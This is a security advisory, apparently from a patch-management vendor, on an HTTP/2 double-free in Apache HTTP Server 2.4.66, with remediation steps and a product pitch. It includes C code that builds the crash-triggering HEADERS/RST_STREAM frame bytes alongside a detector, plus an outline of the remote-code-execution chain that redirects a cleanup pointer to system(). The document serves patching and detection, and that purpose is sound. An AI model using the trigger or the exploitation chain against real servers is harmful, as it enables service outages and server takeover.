The Apache Software Foundation has issued a security update to fix a critical flaw in the HTTP/2 module of Apache HTTP Server, identified as CVE-2026-23918. This vulnerability could be abused to cause a denial-of-service condition and, in certain scenarios, may even allow remote code execution. Although there are no confirmed cases of active exploitation so far, researchers have demonstrated a working proof-of-concept for RCE, making it important to apply patches promptly.
Technical Details
| Attribute | Details |
|---|---|
| CVE ID | CVE-2026-23918 |
| CVSS Score | 8.8 |
| Vulnerability Type | Double-Free |
| Component | mod_http2 — specifically h2_mplx.c |
| Access | Remote, Unauthenticated |
| Impact | Denial of Service (DoS) and potential Remote Code Execution (RCE) |
| Affected Version | Apache HTTP Server 2.4.66 |
| Fixed Version | Apache HTTP Server 2.4.67 |
| Reported To Security Team | Before May 2026 |
| Patch Released | May 2026 |
Impact Summary
This vulnerability leads to two distinct attack outcomes:
| Outcome | Severity | Prerequisites | Notes |
|---|---|---|---|
| Denial of Service (DoS) | High | None; works on any default deployment with mod_http2 enabled and a multi-threaded MPM | Trivial to execute: one TCP connection, two frames, no authentication |
| Remote Code Execution (RCE) | Critical | Apache Portable Runtime (APR) with the mmap allocator | Default on Debian-derived systems and the official httpd Docker image |
Root Cause and Exploitation
Root Cause
The root cause lies in a race-like logical flaw within the HTTP/2 stream teardown path in h2_mplx.c. When a client sends a HEADERS frame followed immediately by an RST_STREAM frame (with a non-zero error code) before the multiplexer has fully registered the stream, the nghttp2 library fires two separate callbacks — one for the RST receipt and one for the stream close. Both of these callbacks independently invoke the same internal cleanup function (m_stream_cleanup), which queues the same h2_stream pointer into the purge list without a guard to detect duplication.
During the subsequent purge pass (c1_purge_streams), h2_stream_destroy and its underlying apr_pool_destroy are called for each entry, so the duplicated entry has its pool destroyed twice. That second apr_pool_destroy on an already-freed pool is the double-free. APR pools return their memory to the allocator's own free lists rather than to libc, so destroying the same pool again corrupts the allocator's bookkeeping; that corrupted heap state is what the RCE chain later builds on.
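As an added illustration, not httpd's code and not the upstream fix, the following C model reproduces the logic described above: two independent callbacks enqueue the same stream into a purge list, and the purge pass destroys every entry. The pool, stream and purge list types are simplified stand-ins for apr_pool_t, h2_stream and the h2_mplx purge list; pool_destroy records a repeated destroy instead of corrupting a real allocator, so the program runs safely. The guarded variant shows one conventional remedy, a per-stream "already queued" flag checked and set at enqueue time; the change that shipped in 2.4.67 is not reproduced here.

```c
/* Added example: simplified model of the stream teardown path, not httpd code.
 * The "pool" is simulated so a repeated destroy is counted, not executed. */
#include <stdio.h>

typedef struct { int destroyed; } pool_t;                  /* stand-in for apr_pool_t */
typedef struct { int id; pool_t *pool; int queued; } stream_t; /* stand-in for h2_stream */

static int double_destroys;   /* times an already-destroyed pool was destroyed again */

static void pool_destroy(pool_t *p) {
    if (p->destroyed) { double_destroys++; return; }  /* real APR: allocator corruption here */
    p->destroyed = 1;
}

#define PURGE_MAX 8
typedef struct { stream_t *items[PURGE_MAX]; int n; } purge_list_t;

/* Vulnerable shape: every caller appends, so the same stream can be queued twice. */
static void cleanup_unguarded(purge_list_t *pl, stream_t *s) {
    if (pl->n < PURGE_MAX) pl->items[pl->n++] = s;
}

/* Guarded shape: the first caller marks the stream queued, later callbacks are no-ops. */
static void cleanup_guarded(purge_list_t *pl, stream_t *s) {
    if (s->queued) return;
    s->queued = 1;
    if (pl->n < PURGE_MAX) pl->items[pl->n++] = s;
}

/* Purge pass: destroy the pool of every queued stream (c1_purge_streams-style). */
static void purge(purge_list_t *pl) {
    for (int i = 0; i < pl->n; i++) pool_destroy(pl->items[i]->pool);
    pl->n = 0;
}

/* HEADERS then RST_STREAM(non-zero) on a stream the multiplexer has not registered:
 * the library fires an RST-received callback and a stream-close callback, and both
 * invoke cleanup for the same stream. Returns the number of double destroys seen. */
int simulate_teardown(int guarded) {
    pool_t pool = {0};
    stream_t s = {1, &pool, 0};
    purge_list_t pl = {{0}, 0};
    void (*cleanup)(purge_list_t *, stream_t *) = guarded ? cleanup_guarded : cleanup_unguarded;
    double_destroys = 0;
    cleanup(&pl, &s);   /* callback 1: RST_STREAM received */
    cleanup(&pl, &s);   /* callback 2: stream closed */
    purge(&pl);         /* one purge pass over the list */
    return double_destroys;
}

int main(void) {
    printf("unguarded cleanup: %d double destroy(s)\n", simulate_teardown(0));
    printf("guarded cleanup:   %d double destroy(s)\n", simulate_teardown(1));
    return 0;
}
```

The point of the model is that cleanup must be idempotent when more than one event can fire for the same object; the flag makes the second enqueue harmless regardless of which callback runs first.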
Exploitation: Denial of Service
The DoS exploitation path is trivial and requires no special tooling or authentication:
- Open a single TCP connection to the Apache HTTP Server.
- Send an HTTP/2 HEADERS frame on any stream ID.
- Immediately send an RST_STREAM frame on the same stream ID with a non-zero error code, before the multiplexer registers the stream.
- The double-free is triggered, causing the Apache worker process to crash.
- Apache respawns the worker, but all in-flight requests on the crashed worker are dropped.
- An attacker can sustain this pattern indefinitely, continuously crashing workers and disrupting services.
No specific URL, headers, authentication credentials, or special content are required to trigger the crash.
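The frame sequence described above, as an added example that is not part of the advisory and not httpd or nghttp2 code: the C program encodes the client connection preface, an empty SETTINGS frame, a HEADERS frame for GET / on stream 1 and a RST_STREAM(CANCEL) on the same stream, then parses the bytes back and counts HEADERS frames immediately followed by a non-zero RST_STREAM on the same stream ID, which is the pattern a network sensor would look for. Framing follows RFC 9113 and the header block RFC 7541 (HPACK static-table indices). The authority value and the CANCEL error code are arbitrary choices; any host name and any non-zero code match the description. Nothing is sent on the wire.

```c
/* Added example (not httpd/nghttp2 code): build, parse and flag the
 * HEADERS -> RST_STREAM sequence in memory. Sample bytes are constructed here. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define H2_HEADERS          0x1
#define H2_RST_STREAM       0x3
#define H2_SETTINGS         0x4
#define H2_FLAG_END_STREAM  0x1
#define H2_FLAG_END_HEADERS 0x4
#define H2_ERR_CANCEL       0x8    /* arbitrary non-zero error code */
#define H2_PREFACE_LEN      24

static const char H2_PREFACE[] = "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n";

typedef struct {
    uint32_t len;            /* 24-bit payload length */
    uint8_t type, flags;
    uint32_t stream;         /* 31-bit stream identifier */
    const uint8_t *payload;
} h2_frame;

/* 9-octet frame header followed by the payload. */
static size_t put_frame(uint8_t *out, uint8_t type, uint8_t flags, uint32_t stream,
                        const uint8_t *payload, uint32_t len) {
    out[0] = (uint8_t)(len >> 16); out[1] = (uint8_t)(len >> 8); out[2] = (uint8_t)len;
    out[3] = type; out[4] = flags;
    out[5] = (uint8_t)((stream >> 24) & 0x7f); out[6] = (uint8_t)(stream >> 16);
    out[7] = (uint8_t)(stream >> 8);           out[8] = (uint8_t)stream;
    if (len) memcpy(out + 9, payload, len);
    return 9 + len;
}

/* HPACK block for GET /: indexed :method GET (2), :scheme https (7), :path / (4),
 * then :authority as a literal without indexing (name index 1, raw value). */
static size_t put_hpack_get(uint8_t *out, const char *authority) {
    size_t alen = strlen(authority), n = 0;
    if (alen > 126) return 0;            /* keep a single-byte length prefix */
    out[n++] = 0x80 | 2; out[n++] = 0x80 | 7; out[n++] = 0x80 | 4;
    out[n++] = 0x01;                      /* literal w/o indexing, name = index 1 */
    out[n++] = (uint8_t)alen;             /* H=0 (not Huffman), 7-bit length */
    memcpy(out + n, authority, alen);
    return n + alen;
}

/* Preface + empty SETTINGS + HEADERS(stream 1) + RST_STREAM(stream 1, CANCEL). */
size_t build_trigger_sequence(uint8_t *out, size_t cap, const char *authority) {
    uint8_t hb[160], err[4] = {0, 0, 0, H2_ERR_CANCEL};
    size_t n = 0, hl;
    if (cap < 256) return 0;             /* worst case 24 + 9 + 140 + 13 fits */
    memcpy(out, H2_PREFACE, H2_PREFACE_LEN); n += H2_PREFACE_LEN;
    n += put_frame(out + n, H2_SETTINGS, 0, 0, NULL, 0);
    hl = put_hpack_get(hb, authority);
    if (!hl) return 0;
    n += put_frame(out + n, H2_HEADERS, H2_FLAG_END_HEADERS | H2_FLAG_END_STREAM, 1, hb, (uint32_t)hl);
    n += put_frame(out + n, H2_RST_STREAM, 0, 1, err, 4);   /* reset before registration */
    return n;
}

/* Parse one frame; returns bytes consumed, 0 if the buffer is truncated. */
size_t parse_frame(const uint8_t *buf, size_t len, h2_frame *f) {
    if (len < 9) return 0;
    f->len = ((uint32_t)buf[0] << 16) | ((uint32_t)buf[1] << 8) | buf[2];
    if (len - 9 < f->len) return 0;
    f->type = buf[3]; f->flags = buf[4];
    f->stream = ((uint32_t)(buf[5] & 0x7f) << 24) | ((uint32_t)buf[6] << 16)
              | ((uint32_t)buf[7] << 8) | buf[8];
    f->payload = buf + 9;
    return 9 + f->len;
}

/* Detection heuristic: HEADERS immediately followed by RST_STREAM with a
 * non-zero error code on the same stream ID. Skips a leading client preface. */
int count_headers_then_rst(const uint8_t *buf, size_t len) {
    h2_frame f; size_t off = 0, n; int hits = 0; uint32_t pending = 0;
    if (len >= H2_PREFACE_LEN && memcmp(buf, H2_PREFACE, H2_PREFACE_LEN) == 0) off = H2_PREFACE_LEN;
    while (off < len && (n = parse_frame(buf + off, len - off, &f)) != 0) {
        if (f.type == H2_HEADERS) {
            pending = f.stream;
        } else if (f.type == H2_RST_STREAM && f.len == 4 && pending && f.stream == pending) {
            uint32_t code = ((uint32_t)f.payload[0] << 24) | ((uint32_t)f.payload[1] << 16)
                          | ((uint32_t)f.payload[2] << 8) | f.payload[3];
            if (code != 0) hits++;
            pending = 0;
        } else {
            pending = 0;
        }
        off += n;
    }
    return hits;
}

int main(void) {
    uint8_t buf[256];
    size_t n = build_trigger_sequence(buf, sizeof buf, "example.test");  /* constructed sample */
    printf("%zu bytes, HEADERS->RST_STREAM pairs: %d\n", n, count_headers_then_rst(buf, n));
    for (size_t i = 0; i < n; i++) printf("%02x%s", buf[i], (i + 1) % 16 ? " " : "\n");
    printf("\n");
    return 0;
}
```

Browsers legitimately cancel streams with RST_STREAM(CANCEL) when a page navigates away or a fetch is aborted, so a single hit is noise; a high rate of HEADERS/RST_STREAM pairs per connection, especially correlated with worker crashes in the error log, is the signal. Production HTTP/2 runs over TLS with ALPN h2, so a detector like this sees the frames only on decrypted traffic or on cleartext h2c.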
Exploitation: Remote Code Execution
The researchers have confirmed a working proof-of-concept for RCE on x86_64 systems. The RCE exploitation chain is more complex and relies on the following:
| Step | Description |
|---|---|
| 1. Trigger double-free | Use the same HEADERS + RST_STREAM sequence to free the h2_stream pool. |
| 2. mmap reuse | On APR mmap allocator systems, the freed virtual address is reclaimed by a subsequent mmap call, allowing the attacker to place a fake h2_stream struct at the freed address. |
| 3. Fake struct construction | The fake struct’s pool cleanup function pointer is overwritten to point to system(). |
| 4. Stable container via scoreboard memory | Apache's scoreboard (the shared memory the parent process uses to track its workers) is mapped once by the parent and inherited by every forked worker, so it sits at the same virtual address in each worker for the lifetime of the server, including workers respawned after a crash; ASLR randomizes layout at exec, not at fork, and so does not move it. This is used as a stable container for the fake structures and the attacker-controlled command string. |
| 5. RCE | When Apache’s pool cleanup routines execute on the manipulated struct, system() is invoked with the attacker’s command string, achieving arbitrary code execution. |
Affected Versions
| Product | Affected Version |
|---|---|
| Apache HTTP Server | 2.4.66 only |
Solution and Mitigations
Apply Security Updates
The Apache Software Foundation has released a patched version. Upgrading is the primary and strongly recommended mitigation. Confirm what is actually running with httpd -v (apachectl -v or apache2ctl -v on most distributions) and check whether mod_http2 is loaded with httpd -M; distribution packages may ship the fix as a patch on top of their 2.4.66 build, so rely on the package changelog rather than the version string alone.
| Action | Target Version |
|---|---|
| Upgrade to | Apache HTTP Server 2.4.67 or later |
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.
